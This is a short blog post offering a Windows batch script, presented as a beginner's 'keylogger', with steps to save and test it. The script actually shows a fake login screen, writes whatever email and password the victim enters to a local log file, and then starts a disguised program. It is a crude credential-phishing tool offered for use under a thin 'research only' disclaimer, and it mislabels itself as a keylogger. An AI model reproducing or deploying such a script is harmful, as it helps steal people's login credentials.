Saturday, 5 November 2016

How to create a keylogger in notepad


@echo off
color a
title Login
cls
echo Please Enter Email Adress And Password
echo.
echo.
cd "C:Logs"
set /p user=Username:
set /p pass=Password:
echo Username="%user%" Password="%pass%" >> Log.txt
start >>Program Here<<
exit




Step 1: Now paste the above code into Notepad and save it as a Logger.bat file.

Step 2: Make a new folder on the desktop and name it Logs (If the folder is not called Logs, then it will not work.)

Step 3: Drag that folder in to the C:

Step 4: Test out the Logger.bat  .




Here is a basic keylogger script for beginners to understand the basics of how keylogging works in notepad. This script should be used for research purposes only.

No comments:

Post a Comment

General PC Tips

  Adjust any setting on your PC with the Windows “God Mode” folder, which is a centralized Control Panel for all the OS settings. Access thi...